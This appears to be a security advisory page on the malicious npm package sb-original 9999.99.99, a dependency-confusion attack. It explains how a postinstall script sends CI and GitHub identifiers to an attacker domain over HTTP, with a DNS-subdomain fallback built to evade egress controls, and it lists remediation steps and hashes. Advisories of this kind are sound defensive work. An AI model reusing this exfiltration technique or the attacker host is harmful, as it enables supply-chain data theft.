Which versions of sb-original are malicious?

The following npm versions of sb-original are flagged malicious: 9999.99.99. Treat any of these as compromised.

How do I remediate sb-original if I installed it?

Remove sb-original from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is sb-original part of a known attack campaign?

Yes — sb-original is associated with the IN-MAL-2026-005257, IN-MAL-2026-005256 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect sb-original in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking sb-original and packages like it before any post-install script runs.

Malicious package

sb-originalnpm

Malicious code in sb-original (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5490

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall sb-original

What this malware does

[email protected] is an unscoped package whose version is set to 9999.99.99 to win semver resolution against any internal package of the same name. index.js transparently re-exports the real sb-original module so consumers see normal functionality, while a postinstall script silently fingerprints the installing environment. On npm install, postinstall.js POSTs JSON containing the consuming package name/version, Node version, OS, detected CI provider, and GitHub repository/owner/workflow identifiers to https://ddactic-lab.online/sc/beacon (postinstall.js:32). It also performs a DNS-based fallback that encodes the same fields as a subdomain of b.ddactic-lab.online (postinstall.js:46 dns.lookup(${sl}.${ci}.${h}.b.ddactic-lab.online,...)), which is designed to bypass HTTP egress controls. The combination of an extreme version floor, a transparent proxy main, and unconditional install-time exfiltration of GitHub repo identifiers to an attacker-controlled domain is the canonical dependency-confusion attack shape.

Malicious versions

1 flagged

9999.99.99

Indicators of compromise (SHA-256)

5419fc906c3b5ca1817006530c8ec07e70675fa10fd9c2be97bda76fb56d7d8d

c0e07a765f6ef2042da47b1c017ecc5f6f1f99167da76e04c4b2c4ea6ecfcb83

Frequently asked questions

No. sb-original on npm has been identified as a malicious package (version 9999.99.99 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005257IN-MAL-2026-005256

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection